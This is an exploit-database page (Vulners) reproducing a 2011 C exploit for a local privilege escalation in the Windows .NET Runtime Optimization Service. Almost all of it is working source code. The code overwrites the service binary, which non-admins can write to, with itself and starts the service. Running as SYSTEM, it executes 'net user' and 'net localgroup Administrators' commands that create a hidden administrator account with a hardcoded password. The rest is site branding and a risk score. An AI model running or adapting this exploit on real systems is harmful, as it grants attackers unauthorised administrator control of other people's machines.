Vulners
Lucene search
.NET Runtime Optimization Service Privilege Escalation Exploit 0day
/*
# Exploit Title: .NET Runtime Optimization Service Privilege Escalation
# Date: 03-07-2011
# Author: XenoMuta <[email protected]>
# Version: v2.0.50727
# Tested on: Windows XP (sp3), 2003 R2, 7
# CVE : n/a
_ __ __ ___ __
| |/ /__ ____ ____ / |/ /_ __/ /_____ _
| / _ \/ __ \/ __ \/ /|_/ / / / / __/ __ `/
/ / __/ / / / /_/ / / / / /_/ / /_/ /_/ /
/_/|_\___/_/ /_/\____/_/ /_/\__,_/\__/\__,_/
xenomuta [at] tuxfamily.org
xenomuta [at] gmail.com
http://xenomuta.tuxfamily.org/ - Methylxantina 256mg
This one's a no-brainer, plain simple:
This service's EXE file can be overwritten by any non-admin domain user
and local power users ( wich are the default permissions set ).
This exploit compiles to a service that uses the original service's id.
Tested on Windows 2003, WinXP (sp3) and Win7
( my guess is that it runs on any win box running this service ).
greetz to fr1t0l4y, L.Garay, siriguillo and the c0ff33 br34k t34m!!
bless y'all!
*/
#include <stdio.h>
#include <windows.h>
SERVICE_STATUS ServiceStatus;
SERVICE_STATUS_HANDLE hStatus;
#define PWN_EXE "c:\\WINDOWS\\Microsoft.NET\\Framework\\v2.0.50727\\mscorsvw.exe"
#define PWN_SHORT "mscorsvw.exe"
#define PWN_NAME ".NET Runtime Optimization Service v2.0.50727_X86"
#define PWN_ID "clr_optimization_v2.0.50727_32"
void ServiceMain(int argc, char** argv) {
if (InitService()) {
ServiceStatus.dwCurrentState = SERVICE_STOPPED;
ServiceStatus.dwWin32ExitCode = -1;
SetServiceStatus(hStatus, &ServiceStatus);
return;
}
ServiceStatus.dwCurrentState = SERVICE_RUNNING;
SetServiceStatus (hStatus, &ServiceStatus);
}
void ControlHandler(DWORD request);
int InitService();
int main(int argc, char **argv) {
char acUserName[100];
DWORD nUserName = sizeof(acUserName);
GetUserName(acUserName, &nUserName);
if (strcmp((char *)&acUserName, "SYSTEM")) {
char *str = (char *)malloc(2048);
memset(str, 0, 2048);
snprintf(str, 2048, "%s.bak", PWN_EXE);
if (rename(PWN_EXE, str) != 0) {
fprintf(stderr, " :( sorry, can't write to file.\n");
exit(1);
}
CopyFile(argv[0], PWN_EXE, !0);
snprintf(str, 2048, "net start \"%s\" 2> NUL > NUL",PWN_NAME);
printf("\n >:D should have created a \n\n Username:\tServiceHelper\n Password:\tILov3Coff33!\n\n");
system(str);
}
SERVICE_TABLE_ENTRY ServiceTable[2];
ServiceTable[0].lpServiceName = PWN_ID;
ServiceTable[0].lpServiceProc = (LPSERVICE_MAIN_FUNCTION)ServiceMain;
ServiceTable[1].lpServiceName = NULL;
ServiceTable[1].lpServiceProc = NULL;
StartServiceCtrlDispatcher(ServiceTable);
return 0;
}
int InitService() {
system("cmd /c net user ServiceHelper ILov3Coff33! /add & net localgroup Administrators ServiceHelper /add");
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1